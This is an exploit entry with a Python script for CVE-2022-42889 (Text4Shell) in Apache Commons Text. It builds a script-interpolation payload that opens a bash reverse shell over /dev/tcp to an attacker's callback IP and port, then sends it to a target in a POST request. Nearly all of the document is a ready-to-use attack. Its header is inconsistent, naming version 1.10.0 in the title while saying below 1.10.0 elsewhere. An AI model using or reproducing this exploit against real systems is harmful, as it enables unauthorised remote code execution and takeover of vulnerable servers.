# Exploit Title: Apache Commons Text 1.10.0 - Remote Code Execution
(Text4Shell - POST-based)
# Date: 2025-04-17
# Exploit Author: Arjun Chaudhary
# Vendor Homepage: https://commons.apache.org/proper/commons-text/
# Software Link:https://repo1.maven.org/maven2/org/apache/commons/commons-text/
# Version: Apache Commons Text < 1.10.0
# Tested on: Ubuntu 20.04 (Docker container), Java 11+, Apache Commons Text 1.9
# CVE: CVE-2022-42889
# Type: Remote Code Execution (RCE)
# Method: POST request, script interpolator
# Notes: This exploit demonstrates an RCE vector via POST data, differing
from common GET-based payloads.
#!/usr/bin/env python3
import urllib.parse
import http.client
import sys
def usage():
print("Usage: python3 text4shell.py <target_ip> <callback_ip> <callback_port>")
print("Example: python3 text4shell.py 127.0.0.1 192.168.22.128 4444")
sys.exit(1)
if len(sys.argv) != 4:
usage()
target_ip = sys.argv[1]
callback_ip = sys.argv[2]
callback_port = sys.argv[3]
raw_payload = (
f"${{script:javascript:var p=java.lang.Runtime.getRuntime().exec("
f"['bash','-c','bash -c \\'exec bash -i >& /dev/tcp/{callback_ip}/{callback_port} 0>&1\\''])}}"
)
encoded_payload = urllib.parse.quote(raw_payload)
path = f"/?data={encoded_payload}" # modify the parameter according to your target
print(f"[!] Remember to modify the parameter according to your target")
print(f"[+] Target: http://{target_ip}{path}")
print(f"[+] Payload (decoded): {raw_payload}")
conn = http.client.HTTPConnection(target_ip, 80)
conn.request("POST", path, body="", headers={
"Host": target_ip,
"Content-Type": "application/json",
"Content-Length": "0"
})
response = conn.getresponse()
print(f"[+] Response Status: {response.status}")
print(response.read().decode())
conn.close()